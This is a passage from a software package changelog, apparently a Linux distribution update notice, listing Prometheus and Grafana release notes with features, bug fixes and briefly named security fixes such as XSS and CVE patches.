Fixed race on concurrent queries against same\n data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*`\n metrics. Additionally\n `prometheus_sd_kubernetes_workqueue_latency_seconds` and\n `prometheus_sd_kubernetes_workqueue_work_duration_second\n s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on\n `prometheus_remote_storage_*` metrics to `remote_name`\n and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded\n TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during\n compaction which should result in lower memory footprint\n during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention\n calculation. #5886\n\n - Remote read: Added query grouping and range hints to the\n remote read request #6401\n\n - Remote write: Added\n `prometheus_remote_storage_sent_bytes_total` counter per\n queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets`\n #6276, TSDB status page #6281 #6267 and many other fixes\n and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range\n and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss\n targets when configurations are similar. #6455\n\n - Remote write: Value of\n `prometheus_remote_storage_shards_desired` gauge shows\n raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and\n alerts where metric results collide with labels\n specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now\n accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and\n `/api/v1/status/buildinfo` endpoints added for use by\n the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime &\n Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a\n compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when\n checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in\n remote write. #6113\n\n - Remote write: do not reshard when unable to send\n samples. #6111\n\n - Service discovery: errors are no longer logged on\n context cancellation. #6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous\n response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for\n kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory\n usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired\n shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query\n history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate\n labels. #6026\n\n - UI: fixes service-discovery view when accessed from\n unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short\n input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le`\n architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API\n endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654,\n tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about\n out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty\n `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint\n number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build\n issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to\n IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317,\n @papagian\n\n - Configuration: Fix env var override of sections\n containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079,\n @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update\n after adding first transform. #25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix\n CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query\n history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992,\n @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705,\n @torkelo\n\n - Transformations: Display correct field name when using\n reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary\n operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not\n working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard\n link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to\n 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer\n limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries\n with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014,\n @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931,\n @torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009,\n @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all\n variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order\n comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there\n is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all\n original field names even after Field default display\n name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are\n visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options\n for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015,\n @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977,\n @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO)\n datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana\n v6.4 and starting from Grafana v7.0.0, all PhantomJS\n support has been removed. This means that Grafana no\n longer ships with a built-in image renderer, and we\n advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval\n is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data\n points that controls the auto interval $__interval\n calculation. Interval was previously calculated by\n dividing the panel width by the time range. With the new\n max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will\n dynamically set $__interval by dividing the current time\n range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints\n has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to\n be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure\n backend plugin binaries and files haven't been tampered\n with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui\n changelog\n\n - @grafana/ui: Select API change for creating custom\n values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is\n not removed but will be in a future release. We hope to\n address the underlying requirement of dynamic dashboards\n in a different way. #24059\n\n - The unofficial first version of backend plugins together\n with usage of grafana/grafana-plugin-model is now\n deprecated and support for that will be removed in a\n future release. Please refer to backend plugins\n documentation for information about the new officially\n supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the\n unofficial first version of backend plugins. #24675,\n @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to\n get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings\n page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and\n add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors\n when opening links in dashboard settings. #24416,\n @torkelo\n\n - Dashboard: Fix so default data source is selected when\n data source can't be found in panel editor. #24526,\n @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent\n back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when\n exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by\n default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content\n formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure\n when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only\n in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593,\n @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup\n indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556,\n @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't\n expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691,\n @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set\n back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in\n provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana\n is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data\n source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when\n switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series\n fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in\n the time picker without being converted to absolute\n range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as\n entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed\n symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000\n entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from\n url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login\n attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built\n for s390\n\n - Add instructions for patching the Grafana JavaScript\n frontend.\n\n - BuildRequires golang(API) instead of go metapackage\n version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: (\n go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding\n CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external\n users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty\n message in Google Hangouts notifier. #23559,\n @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be\n cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw\n dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as\n timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after\n going into edit mode (General folder filter being\n automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option\n properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename\n (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable\n values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for\n the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for\n external plugins that used this property . #23032,\n @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after\n changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when\n dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath\n util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard\n link could contain XSS vulnerability in url. #23254,\n @torkelo\n\n - Variables: Fixes issue with too many queries being\n issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report\n created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when\n exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql\n (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4\n (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for\n angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly\n recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select)\n . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select\n metric now showing after selecting metric node . #22856,\n @torkelo\n\n - Rich History: UX adjustments and fixes. #22729,\n @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce\n Mention Users, Mention Groups, and Mention Channel. The\n first two settings require user and group IDs,\n respectively. This change was necessary because the way\n of mentioning via the Slack API changed and mentions in\n Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff\n to not always be absolute. Something we introduced by\n mistake in 6.1.0. Alerting now support diff(),\n diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In\n our mission to migrate away from AngularJS to React we\n have removed all AngularJS dependencies in the core data\n retrieval service backendSrv. Removing the AngularJS\n dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for\n any request made with backendSrv. Because of this,\n external plugins using backendSrv directly may suffer\n from strange behaviour in the UI. To remedy this issue,\n as a plugin author you need to trigger the digest after\n a direct call to backendSrv. Bug Fixes API: Fix redirect\n issues. #22285, @papagian Alerting: Don't include\n image_url field with Slack message if empty. #22372,\n @aknuds1 Alerting: Fixed bad background color for\n default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to\n annotation, they will now show up right away without a\n manual refresh. #22323, @krvajal Azure Monitor: Fix app\n insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST\n body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker\n CloudWatch: Expand alias variables when query yields no\n result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of\n multiline logs in log panel and explore. #22057,\n @thomasdraebing Heatmap: Legend color range is incorrect\n when using custom min/max. #21748, @sv5d Security: Fixed\n XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null\n values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the\n full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules\n into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the\n docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of\n them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based\n on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951,\n @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if\n one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the\n viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in\n singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804,\n @aocenas\n\n - Datasource: Fixes clicking outside of some query editors\n required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without\n Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git\n user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782,\n @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664,\n @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that\n results in too many decimals for high values. #19618,\n @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533,\n @davkal\n\n - Profile: Fix issue with user profile not showing more\n than sessions sessions in some cases. #19578,\n @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted\n by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard --\n datasource (to share query result) when dashboard had\n rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591,\n @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687,\n @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611,\n @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in\n YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in\n enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP\n was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396,\n @dprokop\n\n - Explore: Take root_url setting into account when\n redirecting from dashboard to explore. #19447,\n @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510,\n @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504,\n @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498,\n @aocenas\n\n - Graph: Fixes minor issue with series override color\n picker and custom color . #19516, @torkelo\n\n - Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries\n (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported\n vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to\n 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207,\n @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported\n queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than\n 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use\n default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles\n . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format\n introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with\n template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder\n updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the\n backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the\n API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks\n notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949,\n @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is\n disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551,\n @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization\n option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660,\n @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time\n using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and\n SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434,\n @dprokop\n\n - Docker: switch docker image to alpine base with\n phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by\n doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085,\n @aocenas\n\n - Explore: Adds ability to go back to dashboard,\n optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212,\n @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368,\n @ryantxu\n\n - Graph: New series override transform constant that\n renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS\n is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter\n values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089,\n @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user\n email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info\n (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden\n (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909,\n @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from\n no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert\n fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add\n notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using\n GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in\n graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if\n Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix\n using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049,\n @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in\n configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in\n FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the\n annotations HTTP API for region annotations. Region\n annotations are now represented using a single event\n instead of two separate events. Check breaking changes\n in HTTP API below and HTTP API documentation for more\n details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base\n image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least\n editor access. New /api/alert-notifications/lookup\n returns less information than /api/alert-notifications\n and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor\n access\n\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than\n /api/org/users and can be access by users that are org\n admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId\n property.\n\n - POST /api/annotations no longer supports isRegion\n property.\n\n - PUT /api/annotations/:id no longer supports isRegion\n property.\n\n - PATCH /api/annotations/:id no longer supports isRegion\n property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of\n dashboards and panels, is deprecated and will be removed\n in a future Grafana release. A deprecation warning will\n from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from\n PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats\n metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to\n loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse\n specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories\n are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error\n for dashboards with panel links that had missing\n properties.\n\n + Editor: Fixes issue where only entire lines were being\n copied.\n\n + Explore: Fixes query field layout in splitted view for\n Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes\n grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching\n to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less\n annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow\n unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time\n series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if\n cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links\n correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying\n datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint 